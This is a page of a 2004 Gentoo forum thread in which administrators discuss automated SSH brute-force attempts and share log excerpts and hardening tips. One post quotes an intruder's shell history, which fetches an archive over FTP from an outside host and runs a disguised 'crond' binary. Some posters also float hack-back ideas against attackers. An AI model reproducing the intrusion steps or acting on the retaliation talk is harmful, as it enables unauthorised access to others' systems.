Gentoo Forums
Gentoo Forums
Gentoo Forums
Quick Search: in
i got hacked. what were they up to?
View unanswered posts
View posts from last 24 hours

Goto page Previous  1, 2, 3, 4 ... 16, 17, 18  Next  
Reply to topic    Gentoo Forums Forum Index Networking & Security
View previous topic :: View next topic  
Author Message
BlinkEye
Veteran
Veteran


Joined: 21 Oct 2003
Posts: 1046
Location: Gentoo Forums

PostPosted: Wed Aug 18, 2004 1:16 pm    Post subject: Reply with quote

skyfolly wrote:
would it be more secure without SSH installed?

Damn it, I have to install iptables and chrootkit tonight right away.

of course it is. every piece of software installed (and running of course) increases the potential risk of reducing the security. if you don't use SSH, don't run it. what you do not use or need shouldn't be running
_________________
Easily backup up your system? klick
Get rid of SSH Brute Force Attempts / Script Kiddies klick
Back to top
View user's profile Send private message
skyfolly
Apprentice
Apprentice


Joined: 16 Jul 2003
Posts: 245
Location: Dongguan & Hong Kong, PRC

PostPosted: Wed Aug 18, 2004 1:47 pm    Post subject: Reply with quote

I am wondering if my server is behind a router, would that router's firewall enough to protect me from anything? I am using port 8080 as http port as 80 is blocked by ISP.

Hard to compromise my server through a router with limited ports open, right?
_________________
Gone forever.
Back to top
View user's profile Send private message
smart
Guru
Guru


Joined: 19 Nov 2002
Posts: 455

PostPosted: Wed Aug 18, 2004 1:52 pm    Post subject: Reply with quote

You don't need to count closed ports anyway, only open ports count and they count equal no matter if the are other ports closed by router or closed due to service non existant.
Back to top
View user's profile Send private message
BlinkEye
Veteran
Veteran


Joined: 21 Oct 2003
Posts: 1046
Location: Gentoo Forums

PostPosted: Wed Aug 18, 2004 2:28 pm    Post subject: Reply with quote

btw, i noticed: over a 100 login attempts during the past few days :twisted:
_________________
Easily backup up your system? klick
Get rid of SSH Brute Force Attempts / Script Kiddies klick
Back to top
View user's profile Send private message
kalisphoenix
Apprentice
Apprentice


Joined: 28 Sep 2003
Posts: 211
Location: Ohio

PostPosted: Fri Aug 20, 2004 6:23 am    Post subject: Reply with quote

user: test
pass: test
shell: /bin/analrapewithnailstuddedbroomstick.sh

I'm sure that there's some way to fuck someone up over ssh. I mean, the connection goes both ways, right?

Of course, I suppose this could have indeterminate results depending on whether he sshed into PersonA's box, then from there to PersonB's, and then to mine.

I am paranoid... I've been noticing these for a few days and thought it was someone fuckin' with me. Found this thread through pure chance. Anyone else getting IPs in Germany, France, and elsewhere?
Back to top
View user's profile Send private message
Jeremy_Z
l33t
l33t


Joined: 05 Apr 2004
Posts: 671
Location: Shanghai

PostPosted: Fri Aug 20, 2004 7:39 am    Post subject: Reply with quote

Well supposing there is buffer overflow in the ssh client, yse you could do some nasty retaliation :lol:
_________________
"Because two groups of consumers drive the absolute high end of home computing: the gamers and the porn surfers." /.
My gentoo projects, Kelogviewer and a QT4 gui for etc-proposals
Back to top
View user's profile Send private message
kalisphoenix
Apprentice
Apprentice


Joined: 28 Sep 2003
Posts: 211
Location: Ohio

PostPosted: Fri Aug 20, 2004 9:14 am    Post subject: Reply with quote

Quote:
# ssh 131.120.22.14
Broadcast message from root (vc/1) (Sat Aug 21 03:25:02 2004):
Owned.
INIT: Switching to runlevel 6
etc


I think that'd be funny enough and keep the guy checking his computer for rootkits and scouring his hard drive for a couple hours. Too bad I don't know jack about ssh or scripting. I guess now's the time to learn...
Back to top
View user's profile Send private message
dat
Apprentice
Apprentice


Joined: 04 Jun 2004
Posts: 186
Location: Location: Location: Location: Location: Location:

PostPosted: Fri Aug 20, 2004 12:49 pm    Post subject: Reply with quote

jpc82 wrote:
Wow I am glad I saw this post.


I was just looking at my logs and I see this
Code:

Aug 13 20:09:28 [sshd] Illegal user test from 194.78.243.110
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!
Aug 13 20:09:29 [sshd] error: Could not get shadow information for NOUSER
Aug 13 20:09:29 [sshd] Failed password for illegal user test from 194.78.243.110 port 3579 ssh2
Aug 13 20:09:31 [sshd] User guest not allowed because shell /dev/null is not executable
Aug 13 20:09:42 [sshd] Failed password for root from 194.78.243.110 port 4229 ssh2



Does this mean that all thier attempts were not successful? I have good passwords, and I run glsa-check every week to verify my system.

Also there is the line "Failed password for root" I'm confused since I have ssh to not allow root access, or is this just the regular error for failed root access?


Also, would moving ssh to another post stop these attacks? I'm assuming it would since they would be trying to connect to the wrong port?


What were you using to generate logs like this??
_________________
HASH BANG SLASH BIN SLASH BASH

in a world without fences, who needs gates?
Back to top
View user's profile Send private message
BlinkEye
Veteran
Veteran


Joined: 21 Oct 2003
Posts: 1046
Location: Gentoo Forums

PostPosted: Fri Aug 20, 2004 2:11 pm    Post subject: Reply with quote

he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means, that he uses some security software.
_________________
Easily backup up your system? klick
Get rid of SSH Brute Force Attempts / Script Kiddies klick
Back to top
View user's profile Send private message
NeddySeagoon
Administrator
Administrator


Joined: 05 Jul 2003
Posts: 38855
Location: 56N 3W

PostPosted: Fri Aug 20, 2004 3:04 pm    Post subject: Reply with quote

I've got some of these break in attempts.
The ones I have checked out all seem to come from *NIX boxes.

You can do whois <IP address from log> to get to the ISP, then send them the log fragment.
More interesting is telnet <IP address from log> 25 to connect to the smtp mail client on the box(es) that were tapping on your door. The ones I have tried all claim to be running sendmail, which suggests they are not windows boxes.

I've not sent mail that way yet, if the probes are comming from a block of dynamically assigned IP addresses, I could well spam the wrong user.

I've been tempted you open a 'honeypot' account that runs a script on every successful login to do the whois lookup, then email abuse@ISP with the log fragment or even email root@<IP _Addr> so innocent victims get to know their box is compromised.
_________________
Regards,

NeddySeagoon

Computer users fall into two groups:-
those that do backups
those that have never had a hard drive fail.
Back to top
View user's profile Send private message
kaidon
n00b
n00b


Joined: 01 Nov 2003
Posts: 72

PostPosted: Fri Aug 20, 2004 3:32 pm    Post subject: Reply with quote

i've also noticed these kind of break in attempts starting arround mid of juli.

found this thread on fulldisclosure explaining a bit what's going on:
http://archives.neohapsis.com/archives/fulldisclosure/2004-07/thread.html#1008

this worm/script/whatever seems to be finding ton's of boxes with same/same accounts out there. ammount of hit's is rapidly increasing.

first it was solely checking for guest and test accounts. in the meantime it checks for guest, test, user, admin and tries multiple root passwords.
it's really becoming a plague.

cheers
k
Back to top
View user's profile Send private message
den_RDC
Apprentice
Apprentice


Joined: 25 Aug 2002
Posts: 165
Location: beercountry, Belgium;)

PostPosted: Fri Aug 20, 2004 11:13 pm    Post subject: Reply with quote

BlinkEye wrote:
he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means, that he uses some security software.

By coincidence, i have the same ip reported in my log files on one of the colocation servers i administer.
Quote:
Aug 20 14:58:07 *hostname* sshd[25514]: reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

Coincedentally, i happen to live in belgium near the city of gent ... Maybe i should organize a scriptkiddie manhunt :).
I don't worry about these messages though - as long as you run a sensibly secured setup with decent passwords and/or keys and take all necessary precautions nothing is going to happen. This is probably some scriptkiddie running some l33t scripts he found on the net that checks for obvious/old vulns that world+dog-idiots have patched/fixed long ago.
Personally, my worst security nightmare is not having a box rooted (wich is bad), but having a damn good hacker on your box and being none the wiser.

edit - i checked another 5 "assorted systems" (colos, my home router, etc) and found that they all have these login attempts. This thing is probably pretty widespread.
_________________
Fan of the "Survivor Warriors of the Evil Empire of Bloody Destruction and Bloody Darkness"
Back to top
View user's profile Send private message
dat
Apprentice
Apprentice


Joined: 04 Jun 2004
Posts: 186
Location: Location: Location: Location: Location: Location:

PostPosted: Sun Aug 22, 2004 11:55 pm    Post subject: Reply with quote

BlinkEye wrote:
he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means, that he uses some security software.


Yeah, that was the line that caught my eye too. I figured he was using some different system logger than I use and that was adding those entries in there. Anyone know what added security software he might be using? Or more importantly, a good add-on to use? (Hopefully not too OT)
_________________
HASH BANG SLASH BIN SLASH BASH

in a world without fences, who needs gates?
Back to top
View user's profile Send private message
rtn
Guru
Guru


Joined: 15 Nov 2002
Posts: 427

PostPosted: Mon Aug 23, 2004 3:28 am    Post subject: Reply with quote

dat wrote:
BlinkEye wrote:
he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means, that he uses some security software.


Yeah, that was the line that caught my eye too. I figured he was using some different system logger than I use and that was adding those entries in there. Anyone know what added security software he might be using? Or more importantly, a good add-on to use? (Hopefully not too OT)


That's actually from OpenSSH. If you look in the file canohost.c in the
openssh sources:

Code:
        if (getaddrinfo(name, NULL, &hints, &aitop) != 0) {
                logit("reverse mapping checking getaddrinfo for %.700s "
                    "failed - POSSIBLE BREAKIN ATTEMPT!", name);
                return xstrdup(ntop);
        }


--rtn
Back to top
View user's profile Send private message
flappy
n00b
n00b


Joined: 06 Jun 2004
Posts: 29
Location: Brisbane, Australia

PostPosted: Mon Aug 23, 2004 6:56 am    Post subject: Reply with quote

gdesklets + multitail - displays your log file to your desktop - i know straight away when someone tries to break in... the moment i see this i log into the attacking systems ssh with the username "f*ck" first then again with the username "off"
Back to top
View user's profile Send private message
nielchiano
Veteran
Veteran


Joined: 11 Nov 2003
Posts: 1283
Location: 50N 3E

PostPosted: Mon Aug 23, 2004 9:19 am    Post subject: Reply with quote

Once again, it is proven that an unprotecter computer on the internet (either win or linux) is not safe; unless YOU take some security steps;

This is how my server is secured (So far NO break-in attempts, but there will be, once upon a time): GUIDE:

  • Run SSH on a non-default port (i.e. NOT on TCP/22). Make your pick 1022, 22022, ... you can go up to 65535
    to do this, edit /etc/ssh/sshd_config, look for (or insert) this rule:
    Code:
    Port 1022
    (change 1022 for your port)
    Of cource, you'll have to specify on ALL the clients that will connect to use that port (ssh -p 1022 under linux)
  • Add a group called 'ssh' (or whatever) add users that should be able to login to that group (to be done as root)
    Code:
    groupadd ssh

    then edit /etc/group and look for the line starting with 'ssh' (or the name you just chose) to the end, add the list of users:
    Code:
    ssh:x:NNN:user1,user2,...
    (NNN will vary)
  • Allow only key-logins:
    You will need to have your key-file with you all the time (e.g. on USB-stcik)

_________________
To an engineer the glass is neither half full, nor half empty - it is just twice as big as it needs to be. (shamelessly stolen from slartibartfasz)
Back to top
View user's profile Send private message
dyqik
Tux's lil' helper
Tux's lil' helper


Joined: 08 May 2003
Posts: 120
Location: Oxford, UK

PostPosted: Mon Aug 23, 2004 9:37 am    Post subject: Reply with quote

Hmm, I have a selection of 6 or 7 attempts to login as test, NOUSER and root in my logs on the 22nd. I have to connect to my work machine (which is connected to the UK academic network, no firewalls allowed beyond what the University provides) from a wide variety of clients, so the only real option for me is to use password SSH on a default port.

On the other hand, I check the logs, and SSH and ICMP are the only open ports, so I think that that is secure enough for now. They didn't seem to want try and crack the passwords. I'm going to disallow root SSH logins though.
Back to top
View user's profile Send private message
dat
Apprentice
Apprentice


Joined: 04 Jun 2004
Posts: 186
Location: Location: Location: Location: Location: Location:

PostPosted: Mon Aug 23, 2004 10:21 pm    Post subject: Reply with quote

rtn wrote:
dat wrote:
BlinkEye wrote:
he wasn't using anything. these are logs from his system because someone tried (and failed) to login.
this line is special though:
Code:
Aug 13 20:09:29 [sshd] reverse mapping checking getaddrinfo for dialup686.gent.skynet.be failed - POSSIBLE BREAKIN ATTEMPT!

which means, that he uses some security software.


Yeah, that was the line that caught my eye too. I figured he was using some different system logger than I use and that was adding those entries in there. Anyone know what added security software he might be using? Or more importantly, a good add-on to use? (Hopefully not too OT)


That's actually from OpenSSH. If you look in the file canohost.c in the
openssh sources:

Code:
        if (getaddrinfo(name, NULL, &hints, &aitop) != 0) {
                logit("reverse mapping checking getaddrinfo for %.700s "
                    "failed - POSSIBLE BREAKIN ATTEMPT!", name);
                return xstrdup(ntop);
        }


--rtn


Weird.. I use openssh and it doesn't log anything like that on failed login attempts.

UPDATE: nm, it's there.. :roll:
_________________
HASH BANG SLASH BIN SLASH BASH

in a world without fences, who needs gates?
Back to top
View user's profile Send private message
froonk
n00b
n00b


Joined: 27 Jul 2004
Posts: 44
Location: Hamburg, Germany

PostPosted: Tue Aug 24, 2004 12:20 pm    Post subject: Reply with quote

I found such entries in my log, too. Anyway, I'm not very afraid of those 'attacks' since I pick my passwords very carefully (at least that's what I suppose). Although I'm a bit afraid that someone could bruteforce any of my accounts. Is there a way to increase the time sshd waits after a failed login? I took a quick look at the man page, but found nothing.
Back to top
View user's profile Send private message
nielchiano
Veteran
Veteran


Joined: 11 Nov 2003
Posts: 1283
Location: 50N 3E

PostPosted: Tue Aug 24, 2004 6:04 pm    Post subject: Reply with quote

froonk wrote:
I found such entries in my log, too. Anyway, I'm not very afraid of those 'attacks' since I pick my passwords very carefully (at least that's what I suppose). Although I'm a bit afraid that someone could bruteforce any of my accounts. Is there a way to increase the time sshd waits after a failed login? I took a quick look at the man page, but found nothing.


can't try it right now (at work), but I think you can do it if you tell SSHd to use PAM and configure that one

A note: If you have him wait for 5 seconds after a failed attempt; make sure that your firewall is also cooperative; else he'll just reconnect for each try; tell your firewall to allow only 1 connection per 5 seconds (from the same IP)
_________________
To an engineer the glass is neither half full, nor half empty - it is just twice as big as it needs to be. (shamelessly stolen from slartibartfasz)
Back to top
View user's profile Send private message
bcore
n00b
n00b


Joined: 09 Apr 2003
Posts: 59
Location: Toronto

PostPosted: Thu Aug 26, 2004 12:39 am    Post subject: Reply with quote

Argh.. Just noticed some more stuff at the bottom of .bash_history.. I didn't even notice this before.. I had snipped the bottom part off, cause I saw my own typing, and figured this was a part of it.

Code:

ls
cd 1
ls
rm -rf run
rm -rf run.tar
uname -a
uptime
ftp powerkill.netfirms.com
ls
tar xzvf ranga.tgz
ls
rm -rf ranga.tgz
cd lib
ls
./crond
./crond
./crond
./crond
./crond
./crond
./crond
ls
cd 1/lib/
ls
find | grep sc
sc
ls randfiles/
tail /var/log/messages
[ true ]
exit


I think it's high time for a reformat. God knows what's on this box now.... damn.
_________________
MR DOWNY: BISCUIT BRAAAAAAAAAAA
YUO: LOL!!!!!
Back to top
View user's profile Send private message
Valhlalla
Apprentice
Apprentice


Joined: 22 Sep 2003
Posts: 161
Location: Sydney, Australia.

PostPosted: Thu Aug 26, 2004 2:19 am    Post subject: Reply with quote

My system is set up to email me any failed logins, but since I'm parranoid I'm going to check anyway :P
_________________
Pork Chop Sandwiches, Oh Sh*t!
Back to top
View user's profile Send private message
qzec
Tux's lil' helper
Tux's lil' helper


Joined: 19 Jul 2004
Posts: 89

PostPosted: Thu Aug 26, 2004 4:21 am    Post subject: Reply with quote

I think its time for me to check my system. 8O

Q
Back to top
View user's profile Send private message
nok
n00b
n00b


Joined: 26 Aug 2004
Posts: 1

PostPosted: Thu Aug 26, 2004 1:58 pm    Post subject: ssh worms, cont.d Reply with quote

There has indeed been a spate of these automated attempts to login to too-obvious accounts of computers running sshd; since July I have had a long list of them for each computer I adminster in the weekly logwatch report.

Some previous postings make this sound quite a desperate situation --- e.g., hardware firewall, portknocking, highly restictive ip ranges allowed to connect, etc. Somewhat following the attitude of the original post, I'd like to say I feel these are over-reactions, i.e. for most people any increase in security would be outweighed by expense or inconvenience.

Turn off unneccesary services.
If having to run services for a local network that are not to be seen from the internet then consider a few simple iptables rules to ensure the services are blocked from the internet regardless of the services' own possible bugs or config file errors.
Update sshd or other servers regularly (e.g. a cron job to emerge sync then check for keywords in the output of emerge -up world ).
Consider forbidding ssh root logins -- a very good idea, since root is one username that no-one needs to guess.
If you really only want to use ssh frrom a few known addresses, try limiting access by address.
Above all, make sure user accounts have good passwords.

I'd be interested to hear comments on whether there have ever been linux iptables problems that would have made a hardware firewall a better option for preventing unwanted incoming connections.

Also, for those mentioning being "rooted" (without a `u'), do you mean the root password was guessed, or that some exploit was run as another user to become root? What exploit? Was it something in a standard gentoo installation.

Finally, try an automated reporting system such as logwatch -- a clever attacker who gains root would be able to hide the activities, but a wealth of information about system changes and failed or successful logins is obtained in other circumstances!
_________________
Nathaniel Taylor
Back to top
View user's profile Send private message
dannycool
Tux's lil' helper
Tux's lil' helper


Joined: 13 Aug 2004
Posts: 111
Location: Karlsruhe Germany

PostPosted: Thu Aug 26, 2004 2:12 pm    Post subject: Reply with quote

nok, rooted just means that the box was entirely compromised and an intruder got root access.



I've been working on a special ssh account on one of my boxes where you get a chrooted bash within a jail that's created on the fly, so after you log out the state of the jail is preserved and any following login would end up with a new jail...

But I'm unsure if I should really open up a ssh account. Even if it can't actually do much (except of course log what has been attempted to do).
Back to top
View user's profile Send private message
Display posts from previous:   
Reply to topic    Gentoo Forums Forum Index Networking & Security All times are GMT
Goto page Previous  1, 2, 3, 4 ... 16, 17, 18  Next
Page 3 of 18

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum